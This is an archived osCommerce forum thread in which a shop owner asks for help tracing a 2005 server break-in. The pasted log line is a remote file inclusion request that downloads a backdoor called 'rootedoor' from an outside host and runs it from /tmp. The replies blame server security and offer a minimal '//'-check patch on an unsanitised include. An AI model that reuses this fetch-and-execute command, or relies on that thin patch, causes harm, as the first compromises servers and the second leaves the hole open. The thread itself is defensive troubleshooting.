Jump to content
dev osCommerce
Forum
  • Checkout
  • Login
  • Contact Us
  • Get in touch

osCommerce

The e-commerce.

New Demo
Our Partners

I need to track down where a security risk is

ervinf

By ervinf
in General Support

Recommended Posts

ervinf

ervinf

Posted
Posted

Total server failure has been contributed to our OS-Commerce cart. The official word is:

 

Here is post from the logs, today, soon after we had everything back up and

running:

 

thefuchsiafrog.com:195.174.225.23 - - [26/Apr/2005:15:55:32 -0500] "GET

/catalog/includes/include_once.php?include_file=http://www.fendora.net/asc/x

pl/asc.txt?&cmd=cd%20/tmp/;wget%20http://www.fendora.net/asc/xpl/rootedoor;c

hmod%20777%20rootedoor;./rootedoor HTTP/1.1" 200 6806 "-" "Mozilla/4.0

(compatible; MSIE 6.0; Windows NT 5.1; SV1)"

[is this a line of code from the cart?]

 

To turn that into english, the attacker used a vulnerability in the websites

/include_once.php file and altered the $include_file variable to include a

file from another website that was placed in the /tmp folder of the server.

Using that same opening, they initiated the file and the command to create a

backdoor into the server to start doing damange.

 

They continue to say:

We have had to

replace and restore the operating system twice, and restore all websites,

twice, in a 24 hour period due to a script vulnerability that was used to

gain access and corrupt binaries of the operating system.

 

Any and all help woul dbe appreciated.

 

Thanks until we resolve this My client is done. . .

Link to comment
Share on other sites
Vger

♥Vger

Posted
Posted

Well, problem with that idea is that there is no include_once.php file in osCommerce.

 

It's far more likely that the hacker managed to gain access to an insecure shared temp folder on the server, or it could be that your hosting company is using an out of date version of PHP that is vulnerable to the php_include worm.

 

Either way, it's a matter of server security and nothing to do with osCommerce.

 

Always provided of course that you are referring to an install of osCommerce and not some 'loaded' version of it which does have such a file. In which case it is again not an osCommerce problem.

 

Just a thought! Does your host provide for 1-click automated installs of osCommerce? In which case the auto-installer might come with such a file. Any such file should however be deleted once the install has completed. So that would leave a problem with the automated install programme.

 

Vger

Link to comment
Share on other sites
oztiks

oztiks

Posted
Posted

My suggestion to patch the problem for the minute is change the includes/include_once.php from

 

<?
 if (!defined($include_file . '__')) {
   define($include_file . '__', 1);
include($include_file);
 }
?>

 

to reflect

 

<?
 if(strstr($include_file,"//")) { die(); }

 if (!defined($include_file . '__')) {
   define($include_file . '__', 1);
include($include_file);
 }
?>

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

Go to topic listing
×
×
  • Create New...